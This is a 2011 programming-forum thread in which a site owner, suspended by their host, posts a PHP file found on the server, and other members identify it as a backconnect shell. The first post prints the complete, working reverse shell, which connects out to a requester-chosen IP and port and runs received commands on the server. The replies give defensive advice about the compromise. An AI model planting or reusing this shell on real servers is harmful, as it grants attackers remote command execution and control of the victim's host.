1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Suspicious code?

Discussion in 'General Programming Chat' started by lossehelin, Jun 19, 2011.

  1. lossehelin

    lossehelin Junior Member

    Joined:
    May 23, 2009
    Messages:
    195
    Likes Received:
    47
    Hi guys. Need a bit o insight about one thing. Today justhost suspended my account and on the report stating why they suspended my account it showed that one of my files was taking up to many resources. I looked at the file and i thought that didd't quite belonged to my site. Checked one of my backups to see if it was present there but it wasn't.

    Now i wan't to know what the code means. I would appreciate if someone that can read php could tell me what the code does:

    Code:
    <?php
    error_reporting (0);
    set_time_limit (0);
    ignore_user_abort (1);
    ob_implicit_flush ();
    define ('_REVSTECK_MSG_SHELL_', ':');
    function RSTRevSteck () {
    function RSTShellMsg ()
    {
    $rstmsg = _REVSTECK_MSG_SHELL_;
    $rstmsg .= shell_exec ('pwd');
    $rstmsg = str_replace ("\n", '', $rstmsg);
    $rstmsg = str_replace ("\r", '', $rstmsg);
    $rstmsg .= '$';
    return ($rstmsg);
    }
    $rsthost = $_REQUEST['rstip'];
    $rstporta = $_REQUEST['rstpo'];
    $rstflag = 1;
    if (!$rsthost) { $rsthost = $_SERVER['REMOTE_ADDR']; }
    if (!$rstporta) { die ('Porta nao informada.'); }
    $rstcon = fsockopen ($rsthost, $rstporta, $rsterrno, $rsterrstr, 1);
    if (!$rstcon) {
    echo 'Erro na linha '.__LINE__.': '.$rsterrstr.' ';
    echo $rsterrno."<br />\n\r";
    die;
    }
    while ($rstflag) {
    $rstbuf = fgets ($rstcon, 1024);
    if (!$rstbuf = trim ($rstbuf)) { continue; }
    if ($rstbuf == 'exit') {
    unset ($rstflag);
    break;
    }
    if (substr_count ($rstbuf, "cd") && strpos ($rstbuf, " ") == 2) {
    $rstexe = chdir (str_replace ("cd ", "", $rstbuf));
    } else {
    if (substr_count ($rstbuf, "ls") && ((
    strpos ($rstbuf, " ") == 2) ||
    strlen ($rstbuf) == 2)) {
    }
    $rstbuf .= " 2>&1";
    $rstexe = shell_exec ($rstbuf);
    $rstexe = str_replace ("\n", "\n\r", $rstexe);
    fwrite ($rstcon, $rstexe, strlen ($rstexe));
    }
    $rstmsgRet = RSTShellMsg();
    fwrite ($rstcon, $rstmsgRet, strlen ($rstmsgRet));
    }
    fclose ($rstcon);
    }
    RSTRevSteck ();
    ?>
     
  2. seeplusplus

    seeplusplus Power Member

    Joined:
    Aug 18, 2008
    Messages:
    517
    Likes Received:
    165
    Not too sure myself, but the first thing it is doing is turning off error reporting, then sets the script to run indefinitely (probably why your host doesn't like it), then sets the script to ignore attempts to stop it (your user account). Then opens a socket to use the internet to (I assume send) what it collects, which seems to be done via a shell.
     
  3. m4dm4n

    m4dm4n Regular Member

    Joined:
    Sep 15, 2010
    Messages:
    223
    Likes Received:
    92
    Occupation:
    /dev/full
    Location:
    /dev/urandom
    that is a backconnect shell
     
  4. other_henry

    other_henry Junior Member

    Joined:
    Jun 1, 2011
    Messages:
    107
    Likes Received:
    19
    Occupation:
    Freelance coder, server guy
    Location:
    US
    The details of the code aren't important, if that isn't your file then you have been hacked.

    It looks like you need to delete files, change passwords, etc. after you figure out how they hacked you.

    Good luck
     
  5. lossehelin

    lossehelin Junior Member

    Joined:
    May 23, 2009
    Messages:
    195
    Likes Received:
    47
    yeah that is true. i need to check my logs
     
  6. coderjeff

    coderjeff Junior Member

    Joined:
    Nov 20, 2007
    Messages:
    130
    Likes Received:
    26
    Location:
    USA
    It's a remote shell which allows someone to use it to execute shell commands on your server.

    I suggest that you edit your original post to remove the code. No sense encouraging people to attack other servers.